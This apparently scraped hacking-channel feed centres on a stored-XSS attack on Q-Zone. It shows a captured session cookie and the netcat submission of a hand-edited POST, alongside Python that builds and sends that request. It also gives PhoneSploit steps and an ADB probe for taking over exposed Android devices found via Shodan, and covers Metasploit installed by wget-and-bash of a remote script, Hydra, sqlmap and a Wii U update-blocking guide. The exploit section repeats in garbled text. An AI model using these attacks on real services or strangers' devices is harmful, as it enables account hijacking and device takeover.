Forwarded from PRIVATE UNDERCODE
Analysis of Q-Zone cross-site vulnerability
youtube.com/undercode
1) Q-Zone filters user input
After entering Q-Zone, click "Settings → Space Settings → Space Name" in turn; on this page the display name of the space can be modified. If we write executable script code here and the filtering is not strict, it will be saved into the home page and run in the browser of anyone who opens it. Let's first test whether we can write a cross-site script into this input box:
2) When entering the code "<script>alert("test")</script>" in the "Space Name" input box, I found that the length of the input was limited: only 24 characters could be entered in total. And when we enter code of the permitted length and click Submit, a dialog box "Please do not include <> and other characters in the input" pops up. It seems that Q-Zone filters the user's input.
3) Check the input filtering method of Q-Zone
Click "View → Source" on the Q-Zone page. Near the beginning of the script you can see the following code segment:
if (!checkFormValue(form1)) return false;          // reject input containing "<", ">" and other filtered characters
len = StrLenOfAscii(form1.spacename.value) / 2;  // byte length of the name, halved: one Chinese character counts as 1
if (len > 12) {
    // ... prompts that the name is too long (the rest of the handler is not shown here)
4) Anyone with a little JavaScript background can read this. The "StrLenOfAscii()" function returns the byte length of the user's input (a double-byte Chinese character counts as 2); that value is divided by 2 and assigned to the len variable, so the limit is 12 Chinese characters or 24 ASCII characters. If the following code finds len greater than 12, it prompts that the name is too long. The most important line is the first one: "if (!checkFormValue(form1)) return false;". The "checkFormValue()" function obviously checks whether the input contains special characters; when it finds a filtered character it pops up the dialog box mentioned above.
5) From this analysis we can be sure that Q-Zone filters the user's input on the client side, in the browser; nothing seen so far shows the server repeating the check.
written by undercode
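To make the point of step 5 concrete, here is an added Python model (example code written for this edit, not code from the original article or from Q-Zone) of the two client-side checks seen in the page source, next to what the server would have to do. The names str_len_of_ascii and check_form_value mirror the page's JavaScript functions; the exact list of characters the real checkFormValue() rejected is not shown on the page, so rejecting only "<" and ">" is an assumption, as is the `<div class="spacename">` markup used for the rendered home page. The browser-side checks can be skipped by anyone who builds the request by hand, so the only checks that count are the ones the server performs, and the only rendering that is safe is the one that escapes.

```python
import html

# Limit derived from the page's JavaScript: StrLenOfAscii(...) / 2 > 12 rejects
# the name, i.e. at most 24 bytes in the page's GBK encoding.
MAX_HALF_LEN = 12


def str_len_of_ascii(value: str) -> int:
    """Mirror of the page's StrLenOfAscii(): byte length in GBK, so a
    Chinese character counts as 2 and an ASCII character as 1."""
    return len(value.encode("gbk"))


def check_form_value(value: str) -> bool:
    """Mirror of the page's checkFormValue(). The real filter list is not
    shown on the page; rejecting only '<' and '>' is an assumption."""
    return "<" not in value and ">" not in value


def client_validate(value: str):
    """What the browser does before submitting. Returns (ok, message)."""
    if not check_form_value(value):
        return False, "Please do not include <> and other characters in the input"
    if str_len_of_ascii(value) / 2 > MAX_HALF_LEN:
        return False, "The name is too long"
    return True, ""


# --- server side, vulnerable: trusts whatever the browser sent -------------

def server_store_vulnerable(posted_value: str) -> str:
    """Stores the POSTed name as-is. Anyone who skips the browser (netcat,
    a proxy, a script) can store '<script>...' here."""
    return posted_value


def render_vulnerable(stored_name: str) -> str:
    """Embeds the stored name in the home page without escaping: stored XSS.
    The surrounding markup is assumed, not taken from Q-Zone."""
    return f'<div class="spacename">{stored_name}</div>'


# --- server side, hardened: repeats the checks and escapes on output -------

def server_store_hardened(posted_value: str) -> str:
    """Re-runs the same rules on the server; the client check is only a hint."""
    ok, message = client_validate(posted_value)
    if not ok:
        raise ValueError(message)
    return posted_value


def render_hardened(stored_name: str) -> str:
    """Escapes on output, so even a value that slipped past validation is
    shown as text rather than parsed as HTML."""
    return f'<div class="spacename">{html.escape(stored_name, quote=True)}</div>'


if __name__ == "__main__":
    payload = '<script>alert("test")</script>'   # the page's test string
    print("browser check:", client_validate(payload))
    print("vulnerable page:", render_vulnerable(server_store_vulnerable(payload)))
    try:
        server_store_hardened(payload)
    except ValueError as err:
        print("hardened server rejected it:", err)
    print("hardened page:", render_hardened(payload))
```

Both server-side measures are needed: the length and character rules stop the obvious payloads, and output escaping covers anything the rules miss, including values written into the database by another path.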
Exploitation of Q-Zone cross-site vulnerability:
t.me/UndercodeTesting
1) Since Q-Zone only filters the user's input on the client, it leaves us an opening: we can bypass the browser-side checks and modify the submitted data directly. But Q-Zone imposes another restriction on submitted data: it does not accept submissions from external sites, so a copy of the form saved as a local HTML file cannot submit normally. We therefore need another way to modify the submitted data.
2) First run a program called WSockExpert. After it starts, click the "Open" button on the toolbar to display the current process list. If you opened Q-Zone from the QQ panel, select "QQ.exe → **'s home" in the process list; if you opened Q-Zone in IE, find the corresponding IE process instead. Confirm, then click "Open" to start monitoring the data exchanged with the web server.
3) Return to the Q-Zone page, enter any string that passes the checks, such as "1234567890", as the space name, and click "Submit". Back in WSockExpert, click the third row (the "send" entry) in the data column and you can see the content of the submitted request:
4) "Content-Length: 20
Cookie: pvid=1575119174; portalentryurl=http://vnet.qq.com/hn/; zzpaneluin=41346583; zzpanelkey=753923CF61AB165D613966B82F8E7F6B2D9E5A681CE7507E9A677086A89BC6DD; clientver=1305; skey=; uin=g

spacename=1234567890"
"Cookie" is the cookie content, which carries the user's authentication; "spacename=1234567890" is the space-name data we submitted; and the earlier "Content-Length: 20" is the length of the submitted body in bytes. In the same data you can also see "Referer: http://q-zone.qq.com/cgi-bin/user/cgi_show_spacename", the address of the page from which the form was submitted.
5) Modify the submitted data
Copy all of the submitted data from the lower window and save it as a file 1.txt. Change "spacename=1234567890" in it to "spacename=<script>alert("test")</script>", and change "Content-Length: 20" to "Content-Length: 40" (the body is now 40 bytes; the header must match the new body length, otherwise the server reads too little or waits for data that never comes).
6) Now we only need to submit this data to the server to bypass the client-side filtering, which needs another tool: NC (netcat).
Copy the saved "1.txt" into the same folder as "nc.exe", open a command prompt in Windows, cd to that folder and run "nc -vv q-zone.qq.com 80 < 1.txt". When the command runs, our modified data is submitted to the remote server.
> We can replace "test" with any Chinese text, but it must first be URL-encoded in the page's encoding (GBK), the form IE would send. For example, "测试" ("test") becomes "%B2%E2%CA%D4". Recompute Content-Length after changing the body.
7) Examine the results of code execution
Open our Q-Zone: a prompt window pops up automatically, which means we have successfully inserted the "<script>alert("test")</script>" code into the remote page! At the same time, on the page for modifying the space name you can see that the originally forbidden space name has been saved.
written by undercode
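The netcat step above fails silently whenever the hand-edited Content-Length or the GBK percent-encoding is wrong, so here is an added Python version (example code for this edit, not a tool from the original post) that builds the same raw POST and computes both. The cookie value and the PATH constant are placeholders: the page only shows the Referer of the form, not the CGI it posts to, so the path must be replaced with the one WSockExpert captured. send_raw() is the equivalent of "nc -vv host 80 < 1.txt" and is the only function that touches the network; the script itself just prints the requests it would send.

```python
import socket

HOST = "q-zone.qq.com"
# Placeholder: the page does not name the CGI the form posts to. Use the
# request line captured by WSockExpert in its place.
PATH = "/cgi-bin/user/cgi_set_spacename"


def gbk_percent_encode(text: str, keep: bytes = b'<>()"/') -> str:
    """Percent-encode text the way IE submitted this GBK page: every byte of
    the GBK encoding that is not URL-safe becomes %XX. Bytes in `keep` are
    left raw because the page sends the <script> tag unencoded."""
    out = []
    for b in text.encode("gbk"):
        if (b < 128 and chr(b).isalnum()) or b in b"-_.~" or b in keep:
            out.append(chr(b))
        else:
            out.append("%%%02X" % b)
    return "".join(out)


def form_body(spacename: str) -> str:
    """The application/x-www-form-urlencoded body, e.g. 'spacename=1234567890'."""
    return "spacename=" + gbk_percent_encode(spacename)


def build_request(host: str, path: str, cookie: str, referer: str, spacename: str) -> bytes:
    """Assemble the raw HTTP/1.0 POST. Content-Length is computed from the
    encoded body instead of being typed by hand, which is the part most
    likely to go wrong when editing 1.txt."""
    body = form_body(spacename).encode("ascii")
    lines = [
        f"POST {path} HTTP/1.0",
        f"Host: {host}",
        f"Referer: {referer}",
        "Content-Type: application/x-www-form-urlencoded",
        f"Cookie: {cookie}",
        f"Content-Length: {len(body)}",
        "",
        "",
    ]
    return "\r\n".join(lines).encode("ascii") + body


def send_raw(host: str, port: int, request: bytes, timeout: float = 10.0) -> bytes:
    """Equivalent of `nc -vv host 80 < 1.txt`: write the bytes, read the reply."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(request)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks)


if __name__ == "__main__":
    # Constructed placeholder cookie; paste the captured Cookie header here.
    cookie = "uin=o0000000000; skey=REPLACE_WITH_CAPTURED_SKEY"
    referer = "http://q-zone.qq.com/cgi-bin/user/cgi_show_spacename"
    for name in ["1234567890", '<script>alert("test")</script>', "测试"]:
        print(build_request(HOST, PATH, cookie, referer, name).decode("ascii"))
        print("---")
    # To actually submit, as nc would:
    # print(send_raw(HOST, 80, build_request(HOST, PATH, cookie, referer, "测试")).decode("gbk", "replace"))
```

The three sample names reproduce the page's numbers: the plain name gives a 20-byte body, the script payload a 40-byte body, and the Chinese name is sent as %B2%E2%CA%D4.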
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Exploitation of Q-Zone cross-site vulnerability :
t.me/UndercodeTesting
1) Now that Q-Zone filters the user input data on the client, it leaves us with an opportunity to use. We can bypass the limitations of the client and directly modify the input data for submission. But Q-Zone imposes another restriction on the data submitted by users, that is, it is not allowed to submit from external sites, and the HTML files we save here cannot submit data normally. Therefore, we must think of another way to modify the submitted data.
2) We first run a software called WSockExpert. After running WSockExpert, click the "Open" button on the toolbar to display the current process list. If you open the Q-Zone with the QQ panel, then select "QQ.exe β ** 's home" in the process list; if you open the Q-Zone with IE, you can find the corresponding process in the IE process and confirm Then click the "Open" button to start monitoring the data exchanged with the website server.
3) Return to the Q-Zone web page, enter any characters that can be submitted, such as "1234567890" at the "space name", and then click "Submit" to return to the WSockExpert, click on the third row near the "send" Data column, you can see the content of the submitted data:
4) "Content-Length: 20
Cookie: pvid = 1575119174; portalentryurl = http: //vnet.qq.com/hn/; zzpaneluin = 41346583; zzpanelkey ββ= 753923CF61AB165D613966B82F8E7F6B2D9E5A681CE7507E9A677086A89BC6DD; clientver = 1305; skey =; uin = g
spacename = 1234567890 "
"Cookie" is the content of the cookie, which contains the user authentication; and "spacename = 1234567890" is the space name data we submitted; the previous "Content-Length: 20" is the length of the submitted data. In the data, you can also see "Referer: http://q-zone.qq.com/cgi-bin/user/cgi_show_spacename", which is the address of the server page we want to submit.
3) Modify the submitted data
After copying all the submitted data in the following window, save it as a 1.TXT file, and change "spacename = 1234567890" in the code to: "spacename = <script> alert (" test ") </ script>", "Content-Length: 20" changed to "Content-Length: 40"
4) Now as long as we submit these data to the server, we can bypass the client's data filtering, which requires another tool called NC.
Copy the "1.txt" saved above to the same folder as "nc.exe", open the command prompt window in the Windows system, enter the folder where NC.exe is located at the command line, enter "nc- vv q-zone.qq.com 80 <1.txt ", after the command is executed, we will submit our modified data to the remote server.
> We can change "Test" to any Chinese, but we need to convert it to IE code first. For example, the IE code for "Test" is "% B2% E2% CA% D4". .
5) Examine the results of code execution
Open our Q-Zone, and a prompt window will pop up automatically. It means that we have successfully inserted the "<script> alert (" test ") </ script>" code in the remote webpage! At the same time, on the page for modifying the space name, you can see the originally restricted space name that has been submitted for modification.
written by undercode
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from PRIVATE UNDERCODE
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
EXPLOIT
> updated - Using open ADB ports we can exploit a device
termux (root) / Linux
INSTALLATION & RUN:
1) git clone https://github.com/Zucccs/PhoneSploit
2) extract adb.rar into the PhoneSploit directory
3) cd PhoneSploit
4) pip install colorama
5) python2 main.py
6) IF ADB IS NOT FOUND:
sudo apt update && sudo apt install android-tools-adb android-tools-fastboot
7) Using open ADB ports (TCP 5555, ADB over the network with no authentication) we can exploit a device. You can find exposed ones here: https://www.shodan.io/search?query=android+debug+bridge+product%3A%22Android+Debug+Bridge%22
@undercodeTesting
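An added Python example (written for this edit; not part of the PhoneSploit project or this post) showing what "open ADB port" means on the wire, so you can verify a host yourself instead of trusting a Shodan banner. It builds the CNXN handshake an adb client sends first, validates the 24-byte header, magic and checksum of the reply, and classifies a CNXN answer as a device that accepted the connection without authentication and an AUTH answer as one that wants RSA key approval first. The device reply in __main__ is constructed for the demonstration; probe() is the only function that touches the network, and it is meant for devices you administer.

```python
import socket
import struct

# ADB wire protocol header: six little-endian uint32s.
#   command, arg0, arg1, data_length, data_check, magic (= command XOR 0xFFFFFFFF)
HEADER = struct.Struct("<6I")
A_CNXN = 0x4E584E43          # b"CNXN" read as a little-endian uint32
A_AUTH = 0x48545541          # b"AUTH"
A_VERSION = 0x01000000       # protocol version an adb client announces
MAX_PAYLOAD = 4096           # maxdata we tell the device we accept


def adb_checksum(payload: bytes) -> int:
    """ADB's data_check field is the plain sum of the payload bytes."""
    return sum(payload) & 0xFFFFFFFF


def adb_message(command: int, arg0: int, arg1: int, payload: bytes = b"") -> bytes:
    """Serialize one ADB message: header followed by payload."""
    header = HEADER.pack(command, arg0, arg1, len(payload),
                         adb_checksum(payload), command ^ 0xFFFFFFFF)
    return header + payload


def connect_message(identity: bytes = b"host::\x00") -> bytes:
    """The CNXN handshake an adb client sends before anything else."""
    return adb_message(A_CNXN, A_VERSION, MAX_PAYLOAD, identity)


def parse_message(data: bytes):
    """Validate header, magic and checksum; return (command, arg0, arg1, payload)."""
    if len(data) < HEADER.size:
        raise ValueError("short ADB header")
    command, arg0, arg1, length, check, magic = HEADER.unpack_from(data)
    if magic != command ^ 0xFFFFFFFF:
        raise ValueError("bad magic: not an ADB message")
    payload = data[HEADER.size:HEADER.size + length]
    if len(payload) != length:
        raise ValueError("truncated ADB payload")
    if adb_checksum(payload) != check:
        raise ValueError("bad ADB checksum")
    return command, arg0, arg1, payload


def classify(command: int, payload: bytes) -> tuple:
    """CNXN back means the device accepted us with no authentication: the
    'open ADB' case, and the payload is its identity string. AUTH means it
    wants an RSA key approved on screen first."""
    if command == A_CNXN:
        return "open", payload.rstrip(b"\x00").decode("ascii", "replace")
    if command == A_AUTH:
        return "auth-required", ""
    return "unknown", ""


def _recv_exact(sock, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("connection closed mid-message")
        buf += chunk
    return buf


def probe(host: str, port: int = 5555, timeout: float = 5.0) -> tuple:
    """Send CNXN to host:port and classify the first reply (network call)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(connect_message())
        header = _recv_exact(sock, HEADER.size)
        length = HEADER.unpack(header)[3]
        payload = _recv_exact(sock, length) if length else b""
    command, _, _, payload = parse_message(header + payload)
    return classify(command, payload)


if __name__ == "__main__":
    # Constructed reply, as an unauthenticated device would answer; no network needed.
    reply = adb_message(A_CNXN, A_VERSION, MAX_PAYLOAD,
                        b"device::ro.product.name=sample;ro.product.model=sample;\x00")
    command, _, _, payload = parse_message(reply)
    print(classify(command, payload))          # ('open', 'device::ro.product.name=sample;...')
```

A device that answers CNXN to an unauthenticated client is the one PhoneSploit can drive; a device that answers AUTH is protected by the usual "allow USB debugging from this computer?" prompt and cannot be used this way.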
Ransomware attacks the largest U.S. ATM supplier - NEWS
1) Diebold Nixdorf, the largest ATM supplier in the United States, has been hit by ransomware.
2) The company stated that the attackers did not reach ATMs or customer networks and only affected its corporate network. Diebold has 35,000 employees and an estimated 35% share of the global ATM market. It also produces point-of-sale systems and software used by retailers.
3) The attack occurred on the evening of April 25. The security team detected abnormal behavior on the corporate network and immediately acted to isolate the affected systems and stop the malware from spreading. The company said the ransomware did not affect its customer networks. The ransomware that got into Diebold's corporate network was ProLock. Diebold said it did not pay the ransom to the attackers; security experts say that was probably the better choice, because the current version of the ProLock decryption tool can damage large files such as databases.
@undercodeTesting
Block Wii U System Updates (Without DNS Blocking!)
Requirements:
> A Wii U & SD card: firmware and SD size don't matter as long as you satisfy the other conditions
> Mocha or Haxchi
> HBL on SD card
> ftpiiu_everywhere (Haxchi) on SD card
> Access to HBL: Browserhax, Haxchi/CBHC, or any other form of entry point are all fine, as long as you can reach it.
> A PC with an FTP client: technically it doesn't have to be a PC; it can even be done on your phone with an FTP client. I'm using the PC for simplicity. FileZilla IS RECOMMENDED.
Optional: use a NAND dumper to back up your NAND with all its contents, as well as dumping the OTP and SEEPROM. With those you can unbrick your system with a hardmod at any point. Dumping the MLC requires a 64GB SD card if your Wii U is 32GB, or a 16GB SD card if your Wii U is 8GB.
1A) Using Haxchi/CBHC:
1) System Menu: Have Haxchi reboot to the System Menu.
2) System Menu: Launch HBL via Haxchi or the browser.
3) HBL: Launch ftpiiu_everywhere.
4) Proceed to the blocking section below, or to the unblocking section if you want to unblock updates again.
1B) Using Mocha:
1) System Menu: Launch HBL via the browser.
2) HBL: Start Mocha (the default values are fine).
3) System Menu: Launch HBL via the browser again.
4) HBL: Launch ftpiiu_everywhere.
5) Proceed to the blocking section below, or to the unblocking section if you want to unblock updates again.
2) Modifying your NAND, and blocking updates:
1) PC: Use an FTP client to connect to your Wii U using the IP address and port shown on the Wii U screen.
2) PC: Once connected, navigate to "storage_mlc/sys/".
3) PC: Locate the "update" folder, right-click it and pick "File Permissions". Make sure they are the same as in the screenshot (not reproduced here). If they are not the same, make a note of them; you will need them if you want to re-enable updates later. If they are the same, proceed to the next step.
Now:
1) PC: Delete the "update" folder.
2) Wii U: Press the "Home" button to get back to HBL, press it again to get back to Mii Maker.
3) Wii U: Exit Mii Maker and open System Settings.
4) System Settings: Attempt to update your Wii U as normal. A few seconds after it starts and the progress bar appears, it should give error code 105-3012. If the progress bar actually continues to move, TURN OFF THE WII U IMMEDIATELY!! Recheck your steps, because something went wrong.
3) Unblocking updates of the Wii U:
If for whatever reason you would like to return the Wii U to its original updating state, start by following "1A)" or "1B)" above, then proceed with the following steps:
1) PC: Use an FTP client to connect to your Wii U using the IP address and port shown on the Wii U screen.
2) PC: Once connected, navigate to "storage_mlc/sys/".
3) PC: Right-click and select "Create Directory". Create an "update" folder. Once created, right-click it again and select "File Permissions".
4) PC: If, when you originally did the blocking section, your permissions matched the screenshot there, enter those same permissions here. If not, enter the values you noted down instead, then click OK.
5) Wii U: Press the "Home" button to get back to HBL, press it again to get back to Mii Maker.
6) Wii U: Exit Mii Maker and open System Settings.
7) System Settings: Attempt to update your Wii U as normal. It should proceed to update normally.
@undercodeTesting
How to install Nmap in Termux
You can install Nmap in Termux just by typing a few commands.
If you have already installed Termux from the Play Store, open Termux and type the command below:
1) termux-setup-storage
You will be asked to give Termux permission to access storage.
After that, type the command below:
2) apt update && apt upgrade
You will be asked whether to upgrade packages to newer versions; simply type y for yes and hit Enter.
3) To install Nmap, type the command below:
pkg install nmap
That's all; you have successfully installed Nmap in Termux.
Hydra for Termux
As you know, Hydra is a powerful brute-force tool for guessing and cracking valid passwords; let's see how we can install it on Termux.
How to install and use Hydra in Termux
Hydra can be installed in Termux just by typing the command below:
> pkg install hydra
After installing Hydra, you can use it by typing hydra in Termux.
Metasploit for Termux
Metasploit is an advanced hacking framework which is now available for Termux; let's see how to install Metasploit in Termux.
We can install Metasploit in Termux by various methods, but I recommend installing it with one automated script.
How to install and use Metasploit in Termux
To install Metasploit in Termux, just type the commands below:
1) cd $HOME
Then type:
2) pkg install wget
Then type:
3) wget https://Auxilus.github.io/metasploit.sh
Finally type:
4) bash metasploit.sh
That's all; you have successfully installed Metasploit in Termux.
To use Metasploit, just type the command below:
./msfconsole
Sqlmap for Termux
Sqlmap is a powerful tool for SQL injection scanning and database dumping of websites.
You can install it by typing a few commands.
First install git by typing:
1) pkg install git
Then type the command below:
2) git clone https://github.com/sqlmapproject/sqlmap
Then install python2 in Termux by typing the command below:
3) pkg install python2
Then go to the sqlmap folder by typing cd sqlmap
Finally type the command below to run sqlmap:
4) python2 sqlmap.py